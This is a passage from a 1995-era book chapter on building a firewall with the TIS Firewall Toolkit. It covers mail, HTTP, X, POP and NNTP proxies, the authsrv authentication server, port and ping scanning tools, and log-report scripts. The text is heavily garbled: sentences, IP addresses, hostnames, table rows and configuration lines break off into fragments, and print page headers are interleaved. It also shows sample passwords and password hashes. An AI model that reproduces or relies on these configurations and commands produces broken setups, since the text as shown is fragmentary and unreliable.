the maxbytes value, the message size is truncated
...
The final clause specifies the maximum number of recipients that can be attached to the
mail message
...
The completed entry for the netperm-table
file looks like this:

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

351

How to Build a Firewall

smap:
smap:
smap:
smap:
smap:

userid 6
directory /var/spool/smap
timeout 3600
maxbytes
10000
maxrecip
20

If you set the value of maxbytes too small, users may not be able to receive some messages
because of the message’s size
...
Lines that
resemble the following indicate the incoming mail message is too large to process:
Oct 29 12:09:52 pc smap[868]: connect host=unknown/198
...
64
...
This is the only way the firewall operator can check
to see if large messages are the reason why mail isn’t being sent
...
It is not very difficult to
complete its setup
...
local script and runs the entire time the system is running
...
local and then the system is rebooted
...
local file:
echo “Starting Firewall Mail Processor
...
To do this,
add a line similar to the following to the crontab file:
0,30 * * * * /usr/sbin/sendmail -q > /dev/null 2>&1

This ensures that any messages that cannot be successfully delivered by the smapd application
will be properly handled
...
They
generally run without a problem
...
The smap application reads the mail queue
on a periodic basis and delivers mail to the remote system
...
10
...
10
smapd Rules
Rule

Description

executable pathname

Specifies the pathname of the smapd executable
...
THIS ENTRY IS MANDATORY
...
smapd
assumes the use of sendmail but does not require it
...

recipN]
...


baddir pathname

Specifies a directory where smapd should move any spooled mail that
cannot be delivered normally
...
The pathname specified should not contain a trailing “/”
...
The name can be
either a name from the password database, or a numeric userid
...


directory pathname

Specifies the spool directory in which smapd should search for files
...


wakeup value

Specifies the number of seconds smapd should sleep between scans of
the spool directory
...


Some options are common for smap and smapd
...
The executable rule identifies
the location of the smapd program
...
The sendmail option specifies
where the sendmail program is found
...

The userid and directory rules specify the user under which the smapd binary executes, and the
home directory used for that configuration
...
The value

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

353

How to Build a Firewall

assigned to directory provides the name of the directory where the in transit mail messages are
stored; a bad directory will be created there to save any undelivered or questionable messages
...

The default is 60 seconds; this example uses a 15 minute window
...
This is done by
adding MX, or mail exchanger, records to the DNS providers for the network domain, or
zone
...

Server: nic
...
net
Address: 198
...
64
...
org
nameserver = nic
...
net
unilabs
...
fonorola
...
org
preference = 10, mail exchanger = mail
...
net
unilabs
...
unilabs
...
org
preference = 5, mail exchanger = nis
...
net
unilabs
...
fonorola
...
fonorola
...
org
nameserver = nic
...
net
unilabs
...
fonorola
...
fonorola
...
53
...
7
fonsrv00
...
com
internet address = 149
...
1
...
fonorola
...
53
...
8
pc2
...
org
internet address = 198
...
166
...
fonorola
...
53
...
14
>

This output is from the nslookup command
...
org
unilabs
...
org

preference = 1, mail exchanger = pc2
...
org
preference = 5, mail exchanger = nis
...
net
preference = 10, mail exchanger = mail
...
net

When mail for the domain unilabs
...
org domain itself
...
In the sample setup
you’ve watched develop throughout this chapter, the host pc2
...
org, which is the
firewall, will be contacted first to see if it can in fact accept the email
...

If the machine with the lowest preference value is not available, then the next system is
contacted—in this case, nis
...
net
...
fonorola
...
unilabs
...
The same is true should the second mail system not
be available and the mail server must then contact the third system
...
For example, the system nis
...
net could
simply decide to attempt delivery itself and not use the next MX record
...
cf file on the remote machine
...


Configuring the HTTP Proxy
The HTTP proxy, http-gw, does more than simply provide a mechanism for HTTP requests
to be sent through the firewall
...

The HTTP proxy also supports “proxy aware” clients, and supports clients that are not
designed to work with these daemons
...

By default, an HTTP or Gopher server usually runs on TCP/IP ports 80 and 70, respectively
...
This is done by adding the following line
to the /etc/services file:
gopher
httpd

70/tcp
80/tcp

With these lines added, inetd now knows on what ports to listen
...
conf:
httpd
gopher

stream
stream

tcp
tcp

nowait
nowait

root
root

/usr/local/etc/http-gw
/usr/local/etc/http-gw

http-gw
http-gw

With the inetd configuration file now updated, inetd must be restarted, or instructed to read
its configuration file using the kill -1 command
...

http-gw reads its configuration rules and permissions information from the firewall configuration table netperm-table, retrieving all rules specified for “http-gw
...
Table 7
...


Table 7
...
If this value is specified, http-gw will set its
userid before providing service
...


directory pathname

Specifies a directory to which http-gw will chroot prior to providing
service
...

Defaults to 60 minutes
...


default-httpd server

Defines an HTTP server to which requests can be handed off if they
came from a WWW client using the HTTP protocol
...
If not
specified, the proxy will do the FTP transaction with the FTP server
...


The userid, directory, and timeout values serve the same functions as the other proxy agents in
the Toolkit
...
To understand their impact, you need to examine
how a non-proxy aware and a proxy aware WWW client operate
...
0 from Microsoft,
cannot communicate with a proxy
...
To do this, the user must specify the URL in the
format:
http://firewall_system/http://destination

as in
http://pc
...
org/http://www
...
org

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

356

Part II: Gaining Access and Securing the Gateway

The client will pass the request for http://www
...
org to the firewall
...

Although a proxy-aware client can still use this format, this is the only format that can be used
with non-proxy HTTP clients
...
Table 7
...


Table 7
...
In these
situations, their WWW client hotlists will have to be edited to include the firewall in the URL
...
However, some application-specific configuration is required to make it work
...

Aside from this application-specific customization, there are no other difficulties in using the
proxy aware client
...

All World Wide Web clients can access Gopher (and FTP) sites
...

Accessing a gopher server with a World Wide Web browser is much easier than with many
Gopher clients, if the World Wide Web browser is proxy-aware
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

357

How to Build a Firewall

Host Access Rules
Up to this point in the chapter, you have seen how the user interacts with the proxy
...

Some of these rules have been examined already, and are important enough to mention again
...
Some of
these parameters include restricting the allowable functions
...
13
...
13
Host Access Rules
Option

Descriptions

Hosts host-pattern [host-pattern
...
]
options]
Deny-hosts host-pattern [host-pattern
...

Typically, a host rule will be in the form of:
http-gw: deny-hosts unknown
http-gw: hosts 192
...
112
...
94
...
*

-permit function
-permit { function [function
...
Other functions will be
denied
...


-deny function
-deny { function [function
...


-gopher server

Make server the default server for
this transaction
...
This will be used
if the request came in through the
HTTP protocol
...
] }

Removes the specified functions when
rewriting selectors and URLs
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

358

Part II: Gaining Access and Securing the Gateway

Several host patterns may follow the “hosts” keyword; the first optional parameter after these
patterns begins with “-”
...

Some basic configuration rules are shown here to help you understand how the options for
host rules are used:
http-gw:
# http-gw:
http-gw:
http-gw:
http-gw:
http-gw:

userid www
directory /usr/local/secure/www
timeout 1800
default-httpd www
...
net
default-gopher gopher
...
net
permit-hosts 206
...
65
...
To deny access to specific hosts or networks, use a line similar to:
http-gw:

deny-hosts 206
...
65
...

The permit-host rules can include function definitions that are permitted or denied depending
on the established criteria in the rule
...
For the deny options the request is used; for filter options the returned
selectors are used
...
14
...
14
Function Definitions
Function

Description

dir

Fetching Gopher menus
...
Fetching an
HTML document
...
HTML files are treated as read even though they
are also dir
...
Needs Gopher+ since only available to Gopher+
and HTTP/1
...


ftp

Accessing an FTP server
...
HTTP methods other than GET
...


exec

Operations that require a program to be run; that is, telnet
...
If no deny or permit functions are specified, every
function is permitted
...
fonorola
...
fonorola
...
116
...
* -deny ftp
deny-hosts 206
...
65
...
A sample error message would look like:
use file fig11
...
somewhere
...
Closing one door but leaving a related one
open is not wise
...
To use a Gopher client, you must configure the default gopher server that is used to
establish the connection to the firewall
...

Because of the looming difficulty associated with Gopher clients, the use of Gopher via the
World Wide Web interface is popular and widely accepted
...


Configuring the X Windows Proxy
The x-gw X Windows proxy is provided to allow a user-level X Windows interface that
operates under the tn-gw and rlogin-gw access control
...

The proxy operates by allowing clients to be started on arbitrary hosts outside the firewall, and
then requesting a connection to the specified display
...
Upon receiving the connection request, x-gw displays the window on the user’s real
display
...
If the
user agrees to accept the connection, x-gw passes the data from the virtual display to the user’s
real display
...
116
...
3
...
unilabs
...

Escape character is ‘^]’
...
unilabs
...
3) ready:
tn-gw-> x
tn-gw-> exit
Disconnecting
...


At this point a window pops up on the user’s display that shows the port number of the proxy
to use; the window also serves as the control window
...

Although the x-gw proxy is advanced and user-friendly, some issues concerning this proxy need
to be mentioned
...
If
your system does not have the X11 libraries or the Athena Widget set, this proxy will not
compile, and you will be forced to live without it
...


Understanding the Authentication Server
The TIS Firewall Toolkit includes extensive authentication mechanisms
...

The authentication server, known as authsrv, is designed to support multiple authentication
processes independently
...
The information stored for each user consists of:
s The user’s name
s The user’s group
s The user’s long name
s The last successful authentication

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

361

How to Build a Firewall

Passwords may be plaintext for local users, or encrypted for all others
...


Warning Plaintext passwords should never be used for authentication by users on nonsecure networks
...
authsrv also contains support for
multiple forms of authentication, including:
s Internal plaintext passwords
s Bellcore’s S/Key
s Security Dynamics SecurID
s Enigma Logics Silver Card
s Digital Pathways SNK004 Secure Net Key

Note The Bellcore S/Key mechanism that is included with the Toolkit does not include the
complete software
...
bellcore
...


When compiling authsrv, the administrator needs to decide which authentication forms will be
supported locally
...
For each proxy in the Toolkit, authentication can be enabled or disabled,
or fit certain criteria, such as incoming must authenticate, and outgoing requires no authentication
...
To
configure the authentication server, you must find an unused TCP/IP port number and add it
to /etc/services
...

authsrv

7777/tcp

# TIS Toolkit Authentication

Authsrv is not a daemon
...
Consequently, it is necessary to add an entry to the /etc/inetd
...
conf files, inetd must
be reloaded or restarted using the kill command
...
Keep in mind that not all operations need to require authentication
...
To see this in action, consider
adding authentication to the FTP proxy
...
authenticated
...
For example,
consider the permit-hosts entry in the following:
ftp-gw: permit-hosts

206
...
65
...
This process will be
demonstrated later in this chapter after you learn how to configure the users in the authentication database
...

This prevents unwanted attempts to probe the authentication server from hosts running
software that needs no authentication
...
15
...
15
Authentication Server Rules
Rule

Description

database pathname

Specifies the pathname of the authsrv database
...
If
the software is built with a compiled-in database name, this
option need not be set; otherwise, it is mandatory
...
The
default message is to simply respond, “Permission Denied
...
If nobogus is set, attempts to
log on will return more explicit error messages
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

363

How to Build a Firewall

Rule

Description

badsleep seconds

Establishes a “sleep time” for repeated bad logins
...
If the
badsleep value is set, the user may attempt to log in again
after the set number of seconds has expired
...
The default value is to effectively disable the
account until an administrator re-enables it manually
...
The
name can be either a name from the password database, or a
numeric user-ID
...
Hosts that do not have a
matching entry are denied use of the service
...


operation user id telnet-gw host
operation user id ftp-gw host put

Operation rules are stored in netperm-table
...
The user/
group field indicates whether the record is for a user or a
group
...
The service can be a service specified by the proxy
(usually ftp-gw, tn-gw, or rlogin-gw)
...
The optional tokens are checked
for a match, permitting a proxy to send a specific operation
check to the authentication server
...


If no other systems on the private network require access to the authsrv, then clients and the
server should be configured to accept connections only using the localhost name or IP address
127
...
0
...
The authentication server configuration rules shown earlier illustrate a sample
configuration for the server
...
0
...
1
database /usr/local/etc/fw-authdb

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

364

Part II: Gaining Access and Securing the Gateway

authsrv:
authsrv:

badsleep 1200
nobogus true

s Identifies that the localhost is allowed to access the server
s Specifies that the authentication database is found in /usr/local/etc/fw-authdb
s The user cannot attempt to authenticate after five bad logins until 1,200 seconds have
expired
s Prints more verbose messages about authentication failures
The operation rule is essential to administrators who want to restrict the commands that can
be executed by certain users at certain times
...
These
rules apply to the authsrv command and not to the individual proxies themselves
...
cdnnet
...
comewhere
...
With the
authentication server configured and ready, users must now be added so that they can be
authenticated whenever necessary
...
This
can be done by using the authsrv command
...

The authentication server has a number of commands, listed in table 7
...


Table 7
...
Before the
authentication server permits the use of this command, the
administrator must first be authenticated to the server as an
administrator or a group administrator
...
When a user is added,
the user is initially disabled
...
Long names should be quoted if
they contain whitespace
...

Before an administrator can use this command, he or she
must first be authenticated to the server as the administrator
or group administrator of the group to which the user
belongs
...
Before the authentication server permits
the use of this command, the administrator must first be
authenticated to the server as the administrator or as the
group administrator of the group to which the user belongs
...

Before this command can be used, the administrator must
first be authenticated to the server as the administrator or
group administrator of the group to which the user
belongs
...
To use this command, the
administrator must first be authenticated to the server as the
administrator
...


list [group]

Lists all users that are known to the system, or the members
of the specified group
...
The list displays
several fields, including:
s
s
s
s

password [username] text

user
...

group
...
If none is
listed, the user is in no group
...
The user’s full name
...

status
...


Sets the password for the current user
...
The password command is polymorphic
depending on the user’s specified authentication protocol
...
If the
authentication protocol is SecurID with PINs, it will update
the PIN
...
16, Continued
Administrator Commands for Authentication Setup
Command

Description

proto user protoname

Sets the authentication protocol for the specified user to the
named protocol
...
To change a user’s authentication
protocol, the administrator must be authenticated to the
server either as the administrator or group administrator of
the user’s group
...


superwiz user

Sets the specified user as a global administrator
...


wiz user
or unwiz user

Sets or turns off the group administrator flag on the
specified user
...


? or help

Lists a short synopsis of available commands
...
To do this, make sure you are logged in as root on the firewall, and run the
authsrv command:
pc# pwd
/usr/local/etc
pc#
...
16
...
No password is associated with the
user
...

authsrv# password chrish whisper
Password for chrish changed
...
Available protocols depend on the protocols that were
compiled when authsrv was built
...
In this instance, the only options available are none and password
...
At this point, the user chris
can authenticate him- or herself using the authentication server
...
Normally this
wouldn’t be done because global administrative privileges supersede the privileges of the group
administrator
...

authsrv# list
Report for users in database
user
group
longname
--------------chrish
production Chris Hare
authsrv#

status proto
------ ----y G passw

last
---never

This output shows the username, the group that the user belongs to, the long name, the status
flags, authentication protocol, and when the user last authenticated
...

authsrv# display chrish
Report for user chrish, group production (Chris Hare)
Authentication protocol: password
Flags: WIZARD GROUP-WIZARD
authsrv#

As you can see, this command provides information similar to the list command, but includes
a text explanation of the flags set for this user
...


The Authentication Shell—authmgr
The authsrv command enables a local user access to the firewall host to manipulate the
database; the authmgr program also allows users to manipulate the database such access, but
from a trusted host on the network or through the local host
...
If the user is not enabled or in the database, the connection is refused
...

pc#
...
This may be apparent, but keep in mind that the authmgr command actually
established a TCP session to the authsrv program
...
The authload command manipulates individual records in the database; it does not

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

369

How to Build a Firewall

truncate an existing database
...
If you have users who share
similar information between sites, the existing records will be overwritten with newer information when this information is loaded by the authload command
...

This ASCII copy contains all the information regarding the user account
...

The authdump command reads the contents of the authentication database and writes the
ASCII text
...
/authdump
user=chrish
longname=Chris Hare
group=production
pass=cY8IDuONJDQRA
flags=2
bad_count=0
proto=p
last=0
user=admin
longname=Auth DBA
group=manager
pass=tx6mxx/lUy2Mw
flags=2

If the command is executed and the output is redirected to a file, the program prints a dot for
each record dumped, along with a report of the total records processed:
pc#
...

3 records dumped
pc#

If you have this information stored somewhere else in a human-readable form (except for the
passwords), you can re-create the user database if the firewall ever needs to be rebuilt
...

The authload command is valuable if the user database was destroyed, or you have a large
number of users to add at once
...
Consider the new
entry added to this ASCII dump file:
user=terrih
longname=Terri Hare
group=production

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

370

Part II: Gaining Access and Securing the Gateway

pass=
flags=0
bad_count=0
proto=p
last=

Now you can load the records into the database, using input redirection because the information is in the ASCII dump file:
pc#
...

4 records loaded
pc#

This results in a report showing the number of records that have been loaded
...
/authmgr
Connected to server
authmgr-> login
Username: admin
Password:
Logged in
authmgr-> list
Report for users in database
user
group
longname
--------------paulp
copy
terrih
production Terri Hare
chrish
production Chris Hare
admin
manager
Auth DBA
authmgr->

status
-----n G
y
y W
y W

proto
----passw
passw
passw
passw

last
---never
never
never
Sat Oct 28 01:45:32 1995

At this point, it is important to note that the new account terrih is enabled, but there is no
password
...

As an added measure of safety, it is advised to add a line to root’s crontab to make “backups”
of the authentication database
...
backup

The cron command will run the authdump command at 1:00 AM, every morning
...
If the information on your server
does not change very often, you probably should adjust the timing of the cron execution of
authdump
...
Each of the
proxies has the option of being configured to operate with the authentication server
...
The FTP proxy’s configuration can be found
in the section “Configuring the FTP Gateway
...
txt
/usr/local/etc/ftp-welcome
...
txt
localhost
7777
3600
206
...
65
...
In fact, it is fairly specific in that any request to retrieve a file
from the remote, or to store a file on the remote results in that operation being logged by the
proxy
...
This process is illustrated here:
pc# ftp pc
Connected to pc
...
org
...
com
220
Name (pc
...
org:chrish): chrish@nds
...
net
331-(----GATEWAY CONNECTED TO nds
...
net----)
331-(220 nds
...
net FTP server (Version A) ready
...

Password:
230 User chrish logged in
...

Using binary mode to transfer files
...

500 command requires user authentication
ftp> quote authorize chrish
331 Enter authentication password for chrish
ftp> quote response whisper
230 User authenticated to proxy
ftp> put /tmp/trace
local: /tmp/trace remote: /tmp/trace
200 PORT command successful
...

226 Transfer complete
...
0061 seconds (3
...


For FTP clients that do not know which proxy is used for authentication, the ftp quote
command must be used to “speak” with the authentication server on the firewall
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

372

Part II: Gaining Access and Securing the Gateway

This is just one example of authentication use with proxies; countless more examples could be
used
...


Using plug-gw for Other Services
The applications you have read about so far cover about 80 percent of the network traffic
...
This application provides plugboard type connections; that is, it
connects a TCP/IP port on the firewall to another host using the same or a different TCP port
number
...
The
next few sections examine the operation and configuration of plug-gw by looking specifically at
their services
...
The clauses listed in table 7
...


Table 7
...
If no timeout is specified, the
default is to remain connected until one side or the other
closes its connection
...
When a connection is made,
a match is searched for on the port-id and calling host
...
If the
calling port matches, then the host-pattern is checked for
a match following the standard address matching rules
employed by the firewall
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

373

How to Build a Firewall

Rule

Description

-plug-to host

Specifies the name or address of the host to connect to
...


-privport

Indicates that a reserved port number should be used
when connecting
...


-port portid

Specifies a different port
...


The purpose of plug-gw is to allow for other services to be passed through the firewall with
additional logging to track the use of these services
...
Some
applications do not have extended authentication mechanisms in them; plug-gw makes their
use with firewalls much less of a bother
...
116
...
* -plug-to 198
...
64
...
116
...
53
...
14
...
Few services actually require these
...

As with the other services, the host pattern that is specified with the port command allows for
both the allowed and non-allowed network or host IP addresses to be specified
...
This protocol also performs news feeds and is often used to provide news reading services at the workstation level
...

In both cases, the NNTP port is defined in the etc/services file as 119
...
116
...
* -plug-to 198
...
64
...
53
...
1
...

For the firewall to accept news connections, inetd must be configured to start the plug-gw
application whenever a connection request is made for the NNTP port
...
conf file and restarting inetd:
nntp

stream

tcp

nowait

root

/usr/local/etc/plug-gw

plug-gw 119

If you configure plug-gw but forget this step, the TIS firewall Toolkit will seem not to
operate—no log messages will print to the files or to the console
...
Normally, this would be the actual NNTP server
that you want to access, but in this case, it is the name or IP address of the firewall
...
If several NNTP servers are available for reading news, you
may want to separate them onto different network ports on the firewall, so that traffic can be
sent to the different sites
...
116
...
* -plug-to 198
...
64
...
116
...
* -plug-to 198
...
64
...
53
...
5 server, they must connect
to the firewall on port 2120
...
3 illustrates the configuration of the WinVN client for
access to news through the firewall
...
3
Configuring WinVN to
use the NNTP proxy
...

What if different news servers are available that your hosts are permitted to connect to? How
does the system administrator configure multiple hosts at the same TCP/IP service port? The
answer is to specify a different port on the firewall, and let plug-gw redirect to the correct port
on the remote system
...
116
...
* -plug-to 198
...
64
...
53
...
5
...
The /etc/services file
should also be edited to add a news NNTP service entry to show the new service port for this
connection
...
This is done by adding the following line to the /etc/inetd
...

nntp-a

stream

tcp

nowait

root

/usr/local/etc/plug-gw

plug-gw 2120

When the user wants to use this alternate server, he or she must reconfigure the news client
software, as shown in figure 7
...


Figure 7
...


Although you can set up your firewall so that NNTP clients can read news, this is generally not
a popular setup
...
This configuration requires the firewall to allow for a news feed to be passed
through to the internal news server
...
The trick is understanding what configuration
information must be placed in the news server configuration files on both ends
...
4
...
nntp provides information regarding what hosts are permitted to connect to the INN
NNTP server
...
5
...
5
News client and server
...
nntp
gatekeeper
...
com

$cat hosts
...
myorg
...
nntp file on each news server contains the name or IP address of the other
news server that is allowed to connect to it
...
nntp files is in fact the name or IP address of the firewall
...
With the hosts
...


plug-gw and POP
When you first think about using plug-gw with the TIS plug-gw application, the obvious
question that comes to mind is “How do I configure things for authentication?” The trick is to
remember which machine is actually performing the authentication
...
It merely accepts the incoming connection on the named port, and
establishes a connection from itself to the named system on the same or different port
...
Consider the
sample output shown here:
$ telnet 206
...
65
...
1
...
53
...
14 starting
...

PASS agdfer
+OK chrish has 0 message(s) (0 octets)
...

$

Notice that the connection to the firewall was established at 206
...
65
...
The remote system
[198
...
64
...

Unfortunately, simply adding the entries to the netpwrm-table file is not enough
...
This is done by
adding the following line to the /etc/inetd
...
This is done by adding this next line to the
netperm-table file:
plug-gw:

port 110 206
...
65
...
53
...
14

After it is added, POP service requests received by the firewall are redirected to the specified
server
...
6 shows a configuration screen from the Eudora 1
...
6
Setup for a POP e-mail
package
...
The IP or name of the firewall can be used
interchangeably in this field
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

378

Part II: Gaining Access and Securing the Gateway

Consequently, when the incoming connection is received on port 110, plug-gw starts a session
to the remote host specified in the plug-gw rule
...

Incidentally, the POP mail client in use is irrelevant
...


The Companion Administrative Tools
A set of support tools are included with the TIS Toolkit to assist in the setup and ongoing
administration of the firewall
...


Note Depending upon the version and completeness of the Toolkit you downloaded,
some services and programs may not be installed or compiled automatically
...


portscan
The portscan program attempts to connect to every TCP port on a given machine
...
The portscan program’s
scan of the machine pc
...
org, for example, was answered by the following ports:
pc#
...
unilabs
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

379

How to Build a Firewall

netscan
This is a network ping program
...
Its default output is a list of each of the addresses that responded
to the ping, along with the host’s name
...
/netscan 198
...
32
198
...
32
...
Toronto
...
net (198
...
32
...
53
...
9
Harte-Lyne-gw
...
fonorola
...
53
...
10)
198
...
32
...
Toronto
...
net (198
...
32
...
53
...
5
...
This
indicates that either no device exists, or netscan attempted to contact a device that does not
respond to pings
...
In verbose mode, addresses that respond to a
ping are placed with their name or address flush left; addresses that did not respond are
indented one tab space
...
/netscan -v 198
...
32
trying subnet 198
...
32
198
...
32
...
53
...
2
198
...
32
...
53
...
4
198
...
32
...
Toronto
...
net (198
...
32
...
53
...
7
198
...
32
...
53
...
9
Harte-Lyne-gw
...
fonorola
...
53
...
10)
198
...
32
...
53
...
12
198
...
32
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

380

Part II: Gaining Access and Securing the Gateway

Reporting Tools
The TIS Toolkit, configured as a firewall, logs transactions and requests processed by Toolkit
applications, and records the outcome of these requests
...
The files used to save the details are listed in /etc/syslog
...
The TIS Toolkit applications all interact with the syslog service
and send logging information and status messages for the lifetime of the connection
...
Because the logging is performed using
the syslogd service, the log messages observe the standard format:
Date Time hostname program[PID]: message

This format appears in the log file looking like this:
Oct 4 02:42:14 pc ftp-gw[1763]: permit host=stargazer
...
org/204
...
3
...
Some of these are illustrated
in the following output:
cannot connect to server 198
...
64
...
53
...
14/110: Operation timed out
cannot connect to server nis
...
net/110: Connection refused
cannot connect to server nis
...
net/110: Operation timed out
cannot get our port
connect host=stargazer
...
org/206
...
65
...
53
...
14/110
connect host=unknown/206
...
65
...
53
...
14/110
connected host=pc
...
org/204
...
3
...
fonorola
...
191
...
150/pc
...
org connect to fox
...
ca
deny host=pc
...
org/204
...
3
...
unilabs
...
191
...
147 destination=sco
...
com
deny host=unknown/206
...
65
...
unilabs
...
116
...
2 destination=198
...
64
...
116
...
2 destination=198
...
64
...
unilabs
...
191
...
150 dest= in=0 out=0
exit host=pc
...
org/204
...
3
...
unilabs
...
191
...
150 dest=nds
...
net in=35 out=21
¯user=unauth duration=37

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

381

How to Build a Firewall

exit host=pc
...
org/204
...
3
...
unilabs
...
191
...
147 cmds=1 in=0 out=0 user=unauth
¯duration=2
exit host=stargazer
...
org/204
...
3
...
gif (80)
fwtksyserr: cannot display denial-msg /usr/local/etc/tn-deny
...
txt: No such file or
¯directory
fwtksyserr: cannot display help message /usr/local/etc/rlogin-help
...
txt: No such file
¯or directory
fwtksyserr: cannot display welcome /usr/local/etc/tn-welcome
...
unilabs
...
116
...
2 protocol=HTTP cmd=dir
dest=www
...
ca path=/
log host=stargazer
...
org/206
...
65
...
gif
¯path=/
log host=stargazer
...
org/206
...
65
...
nstn
...
cgi
Network connection closed during write
permit host=pc
...
org/204
...
3
...
191
...
252
permit host=pc
...
org/204
...
3
...
fonorola
...
unilabs
...
191
...
150 use of gateway
permit host=stargazer
...
org/204
...
3
...
fonorola
...
unilabs
...
191
...
147 destination=204
...
3
...
unilabs
...
191
...
147 service=ftpd execute=/usr/libexec/
¯ftpd
permit host=stargazer
...
org/204
...
3
...
unilabs
...
191
...
147 service=telnetd execute=/usr/
libexec/telnetd
permit host=stargazer
...
org/204
...
3
...
unilabs
...
116
...
2 use of gateway (Ver p1
...
The only way to see a complete list of
possible log messages and their exact meanings is to perform a line-by-line review of the TIS
Toolkit code, and then document each item individually
...
These shell scripts, listed in table 7
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

382

Part II: Gaining Access and Securing the Gateway

Table 7
...
sh

Summarizes auth server reports

daily-report
...
sh

Reports on denial of services

ftp-summ
...
sh

Summarizes the http-gw traffic

netacl-summ
...
sh

Summarizes smap email records

tn-gw-summ
...
sh

Top-level driver that calls each summary report generator

The reporting tools included in the TIS Toolkit are not installed automatically when the
Toolkit applications are compiled and installed
...
admin
...
This copies all the
files to the same directory in which the Toolkit applications were copied
...
A typical report of authsrv-summ
...
/authsrv-summ
...
0
Top 100 permitted user authentications (total: 6)
Logins
User ID
-----------4
admin
2
chrish
Top 100 failed user authentications (total: 2)
Attempts
Username
--------------1
paulp
1
chrish

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

383

How to Build a Firewall

Authentication Management Operations
----------------------------------administrator ADDED admin
administrator ADDED admin
administrator ADDED chrish
administrator ADDED chrish
administrator ADDED paulp
administrator DELETED admin
administrator DELETED chrish
administrator ENABLED admin
administrator ENABLED chrish
administrator GROUP admin manager
administrator GROUP chrish production
administrator GROUP paulp copy
administrator GWIZ chrish
administrator GWIZ chrish
administrator GWIZ paulp
administrator PASSWORD admin
administrator PASSWORD chrish
administrator PROTOCOL admin
administrator PROTOCOL chrish
administrator UN-GWIZ chrish
administrator WIZ admin
administrator WIZ chrish

Notice that this and all the other reporting tools expect to read their data from the standard
input stream
...

The authsrv summary report lists the total authentication requests made and by whom, the
denied authentication, and the authentication database management operations
...


The Service Denial Report
The purpose of the service denial report is to identify hosts that attempted to connect through
the firewall and were not permitted
...
sh looks like this:
pc#
...
sh < /var/log/messages
...
unilabs
...
116
...
3 - chrish
Top 100 network service users (total: 152)
Connects
Host/Address
------------------120
stargazer
...
org/206
...
65
...
unilabs
...
116
...
3:ftp
5
stargazer
...
org/206
...
65
...
unilabs
...
116
...
2:telnetd
3
stargazer
...
org/206
...
65
...
unilabs
...
116
...
3:telnet
2
stargazer
...
org/206
...
65
...
unilabs
...
116
...
3:
1
unknown/206
...
65
...
unilabs
...
116
...
3:telnetd
1
pc
...
org/206
...
65
...
unilabs
...
116
...
2:telnet
2
pc
...
org/206
...
65
...
116
...
2:110
1
stargazer
...
org/206
...
65
...
unilabs
...
116
...
2:110
1
stargazer
...
org/206
...
65
...
unilabs
...
116
...
3:2120
1
pc
...
org/206
...
65
...
unilabs
...
116
...
3:110
1
pc
...
org/206
...
65
...
All of these examples may be legitimate problems, or potential security breaches
...
It
identifies the number of connections, the origin of the connection, and the amount of data
transferred
...
sh looks like this:
pc# cat /var/log/messages* |
...
sh
FTP service users (total: 23)
Connects
Host/Address
------------------13
stargazer
...
org/204
...
3
...
unilabs
...
116
...
3
3
pc
...
org/204
...
3
...
unilabs
...
116
...
2
Denied FTP service users (total: 4)
Connects
Host/Address
------------------2
pc
...
org/206
...
65
...
fonorola
...
191
...
252
FTP service output thruput (total Kbytes: 6)
KBytes
Host/Address
----------------6
pc
...
org/206
...
65
...
unilabs
...
116
...
3
0
stargazer
...
org/206
...
65
...
unilabs
...
191
...
147
pc#

As you can see in this report, several service denials occurred on this firewall
...
Many sites choose
to not allow FTP at all because of the potential problems associated with pirated software or
virus infected software
...

The report covers connection requests, denied service requests, and input and output through
the proxy
...
/http-summ
...
unilabs
...
116
...
2
2
pc
...
org/206
...
65
...
116
...
2
Denied HTTP service users (total: 1)
Connects
Host/Address
------------------1
stargazer
...
org/206
...
65
...
unilabs
...
116
...
2
HTTP service input thruput (total Kbytes: 315)
KBytes
Host/Address
----------------315
stargazer
...
org/206
...
65
...
You can see this in list 4; 1 KB of data out through the firewall resulted in 315
KB from the remote end
...
This program enables administrators and other users to operate directly on the firewall
without the need to be on the console
...
A sample execution of the netacl-summ
...
/netacl-summ
...
unilabs
...
191
...
147
13
stargazer
...
org/206
...
65
...
116
...
2

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

387

How to Build a Firewall

2
2

unknown/204
...
3
...
unilabs
...
116
...
3

Top 100 Denied network service users (total: 11)
Connects
Host/Address
------------------6
pc
...
org/204
...
3
...
unilabs
...
191
...
147
1
stargazer
...
org/206
...
65
...
fonorola
...
191
...
252
1
mail
...
net/198
...
64
...
This setup was chosen so that you, the network administrator, could update files
and interact with the firewall from places other than the console
...

This report identifies sites that are attempting to log in or ftp directly to the firewall itself,
rather than log in to a site behind the firewall
...
Many sites do not allow any traffic other than mail through the
firewall; for this reason, knowledge of the amount of information available helps determine if
the chosen hardware platform is in fact doing the job
...

The following sample execution of the mail report, smap-summ
...
/smap-summ
...
6
skhan@compmore
...
6
chrish
2
2
...
3713@compuserve
...
5 chrish@fonorola
...
1
chrish@unilabs
...
9
denny@nstn
...
9
chrish@nds
...
net

Top 100 mail senders (in messages)
Messages
Count
Kb
Address
